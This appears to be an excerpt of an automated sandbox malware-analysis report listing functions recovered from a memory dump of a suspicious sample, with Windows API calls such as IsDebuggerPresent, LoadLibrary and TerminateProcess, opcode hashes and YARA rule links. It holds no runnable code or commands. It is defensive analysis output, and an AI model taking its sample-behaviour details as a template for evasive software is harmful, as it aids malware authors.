                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: 4a778d4d30e9aae641ecc552325410c447e62098130b67cb147b2f9d36ce9efd
                                                                                                                                                                            • Instruction ID: c41f5b14db49b1c53a4fc1feb126a69eafcf19fd1479a961298a364d87eeda90
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a778d4d30e9aae641ecc552325410c447e62098130b67cb147b2f9d36ce9efd
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A018431145225BAE7711A25CC0EF977F54FF02775F648210BE989E1E0C7B45458CB90
                                                                                                                                                                            Function 008532A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 008532C4
                                                                                                                                                                              • Part of subcall function 0085326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00853282
                                                                                                                                                                              • Part of subcall function 0085326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00853299
                                                                                                                                                                              • Part of subcall function 00853312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,008532EF,?), ref: 00853342
                                                                                                                                                                              • Part of subcall function 00853312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,008532EF,?), ref: 00853355
                                                                                                                                                                              • Part of subcall function 00853312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00922418,00922400,?,?,?,?,?,?,008532EF,?), ref: 008533C1
                                                                                                                                                                              • Part of subcall function 00853312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00853442
                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 008532FE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                            • Opcode ID: 25c0f4ab093786f530eb69253f86b0f68557d66fb292e67db7624b2deef3d0eb
                                                                                                                                                                            • Instruction ID: 30916bf9ccfaa38a36de4b49ab05676429130aec12b848441b65e9f85c66dddf
                                                                                                                                                                            • Opcode Fuzzy Hash: 25c0f4ab093786f530eb69253f86b0f68557d66fb292e67db7624b2deef3d0eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 86F0547156C744AFE710EF64FC0AB643790F708B46F504405B90CC92E2DFB99556AB41
                                                                                                                                                                            Function 0086F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • timeGetTime.WINMM ref: 0086F97A
                                                                                                                                                                              • Part of subcall function 0085EE07: GetInputState.USER32 ref: 0085EEB7
                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 008AFAC2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InputSleepStateTimetime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4149333218-0
                                                                                                                                                                            • Opcode ID: ceabbba4604b15e9fb4761995d960e8b0541b332c4d7dfe60aaa13c1fe697b6a
                                                                                                                                                                            • Instruction ID: 292c02c1aa08c5641993bfe329a2c008f72e7e91b12a130fd874acd5a5c1cf10
                                                                                                                                                                            • Opcode Fuzzy Hash: ceabbba4604b15e9fb4761995d960e8b0541b332c4d7dfe60aaa13c1fe697b6a
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F08C71240705AFD314EFA9D849B5AFBE9FF49361F00402AE95ACB261DB70A804CB92
                                                                                                                                                                            Function 008794D1 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0088506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00919C08,00000010,008794DE), ref: 008850CC
                                                                                                                                                                              • Part of subcall function 0088506A: _free.LIBCMT ref: 008850DA
                                                                                                                                                                              • Part of subcall function 0088510A: _free.LIBCMT ref: 0088512C
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(-00000020), ref: 008794FA
                                                                                                                                                                            • _free.LIBCMT ref: 0087950E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$CriticalDeleteSection
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1906768660-0
                                                                                                                                                                            • Opcode ID: cd4f90ef8d2a40109e0585aab18d3b8ed71cc3587158526efcf74d7002439396
                                                                                                                                                                            • Instruction ID: 087493f472869ee759ff2cc4665264fe0cc32b519be9abed72605b72624f2771
                                                                                                                                                                            • Opcode Fuzzy Hash: cd4f90ef8d2a40109e0585aab18d3b8ed71cc3587158526efcf74d7002439396
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE04F378289108BD731B76CFC56A5937F4FB5A350B054416F405D3129DF25AC63974A
                                                                                                                                                                            Function 00858774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0085AE65,?,?,?), ref: 00858793
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0085AE65,?,?,?), ref: 008587C9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 626452242-0
                                                                                                                                                                            • Opcode ID: 216f97b7f84d675e456777f9a44ff37c562400fc3e80ac84bf07a8eaa97814b1
                                                                                                                                                                            • Instruction ID: f76497057fd5290714b4b7c09814e9fe200708889d0bfd6d2a7c63efbb457a12
                                                                                                                                                                            • Opcode Fuzzy Hash: 216f97b7f84d675e456777f9a44ff37c562400fc3e80ac84bf07a8eaa97814b1
                                                                                                                                                                            • Instruction Fuzzy Hash: B101F771300204BFEB18AB799C4BF7F7AADEB88340F10403EB506DA1D0EDA09C009535
                                                                                                                                                                            Function 0085CA50 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0085CE8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                            • Opcode ID: b220f69dc0b732d8a0a81f86173c34a881097effe9f270dbf39bea3523f8aa77
                                                                                                                                                                            • Instruction ID: 1f888c5efa6e930fee70e0ec3b1096dd3eedcba30698a01ddfac2b9e7e879688
                                                                                                                                                                            • Opcode Fuzzy Hash: b220f69dc0b732d8a0a81f86173c34a881097effe9f270dbf39bea3523f8aa77
                                                                                                                                                                            • Instruction Fuzzy Hash: 2632BB74A002099FDF20CF58C889ABABBB5FB45315F188059EC06EB251C774AE45CF91
                                                                                                                                                                            Function 0087F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e83a3aa763647a37e7de801945c1d76671ce06f4b2d9beb3c70affb76958712
                                                                                                                                                                            • Instruction ID: d39fd37414b24e34a6abf50ba6cd46b8f6a015d4d4a18c8e4f15b6063013de2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e83a3aa763647a37e7de801945c1d76671ce06f4b2d9beb3c70affb76958712
                                                                                                                                                                            • Instruction Fuzzy Hash: A751C135A14208AFDB10DF69C840AA97BA1FF85364F19C168EA1CDB397D731ED42CB91
                                                                                                                                                                            Function 00870000 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • TerminateProcess.KERNELBASE ref: 008700AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 560597551-0
                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction ID: 600ed9394ccf9c66348d602dc542a242b3ccf924808848ace1b2e9f6e739d914
                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31E070A00509DBC718CF58C484A69F7A2FB59324B28C6A9E40ECB35AD732EDC1CF90
                                                                                                                                                                            Function 008C8E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 008C8EBE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FullNamePathPrivateProfileString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1991638491-0
                                                                                                                                                                            • Opcode ID: d09874e49cd723e7a04797a3e4aab35c026497aa1c3f44dcbd6595d7421ca8a7
                                                                                                                                                                            • Instruction ID: 3f77823a8056b66a504e1161ee510ab9a8e4f9570548992e934830d8fdfb998b
                                                                                                                                                                            • Opcode Fuzzy Hash: d09874e49cd723e7a04797a3e4aab35c026497aa1c3f44dcbd6595d7421ca8a7
                                                                                                                                                                            • Instruction Fuzzy Hash: D7212C35600605EFCB01EB68C842CAEB7B5FF48361B048054F945AB361DB30FD49CB91
                                                                                                                                                                            Function 0085636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00856332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 0085633E
                                                                                                                                                                              • Part of subcall function 00856332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00856350
                                                                                                                                                                              • Part of subcall function 00856332: FreeLibrary.KERNEL32(00000000,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856362
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,008560AA,?,00000001,?,?,00000000), ref: 0085639F
                                                                                                                                                                              • Part of subcall function 008562FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856304
                                                                                                                                                                              • Part of subcall function 008562FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00856316
                                                                                                                                                                              • Part of subcall function 008562FB: FreeLibrary.KERNEL32(00000000,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856329
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                            • Opcode ID: 86cdcaaa41ac754b9f6f00c51ded62f34763ad81d8e8c60f7e2d4ee60348fec4
                                                                                                                                                                            • Instruction ID: 01bde81852bbac4adaf517fe575a675a222579a4d0263ac67560cd6b8f0d8d27
                                                                                                                                                                            • Opcode Fuzzy Hash: 86cdcaaa41ac754b9f6f00c51ded62f34763ad81d8e8c60f7e2d4ee60348fec4
                                                                                                                                                                            • Instruction Fuzzy Hash: CA11E732640205AACF14BB28CC02BED77A5FF50756FA0842DFD42EB2C1FEB49A599751
                                                                                                                                                                            Function 00888792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                            • Opcode ID: 71dbdc4cee20b5d6020c68c5472e04314db2579f5c1b47f80a3be4f0d7409568
                                                                                                                                                                            • Instruction ID: 812abe7c8d2705f9d0ca347d1d8a0ce1310412169099cb69191ab76a645e43d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 71dbdc4cee20b5d6020c68c5472e04314db2579f5c1b47f80a3be4f0d7409568
                                                                                                                                                                            • Instruction Fuzzy Hash: DA11187590410AEFCF15EF58E94199E7BF5FF48310F104069F809EB311DA31EA218BA5
                                                                                                                                                                            Function 0085B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00856B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0085B0AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 3efa6d40d2e79aa37eda0d1c1d95fdb744f5b49dbc958fee34a460b4443c3488
                                                                                                                                                                            • Instruction ID: 7309bb11612fe93abc760874334c8d74ee284bd78e9ceed2ff0339bdd24f343e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3efa6d40d2e79aa37eda0d1c1d95fdb744f5b49dbc958fee34a460b4443c3488
                                                                                                                                                                            • Instruction Fuzzy Hash: B8113631200B05DFD7208E15C880B67B7E9FF64365F10C42EE9AA8BA91C771E949CB60
                                                                                                                                                                            Function 00885390 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0088500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,008831B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088504E
                                                                                                                                                                            • _free.LIBCMT ref: 008853FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                            • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                                                                                            • Instruction ID: 390d5e4e948fd81fe192815f7a3b41498362b4ecb0a9bcda047d126268a59b3e
                                                                                                                                                                            • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                                                                                            • Instruction Fuzzy Hash: C50126B22047096BE3219E699845A5AFBD8FB8A370F25062DE5D4C3280EA70A805CB75
                                                                                                                                                                            Function 008541E6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008533E9,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00854227
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FullNamePath_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4019309064-0
                                                                                                                                                                            • Opcode ID: 01295b9fa141a5648517bc7aab70149ff3081ea459b5141c471f85fda1a236ac
                                                                                                                                                                            • Instruction ID: 0d31293919a1d0c08fd406840df284223cd542204e5daa2bf2cde0b9c4dd9744
                                                                                                                                                                            • Opcode Fuzzy Hash: 01295b9fa141a5648517bc7aab70149ff3081ea459b5141c471f85fda1a236ac
                                                                                                                                                                            • Instruction Fuzzy Hash: A5118231600229AB8F10FBA89801EDE77A8FF0834AF004065BD45E7295EE7497CC9712
                                                                                                                                                                            Function 0087E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
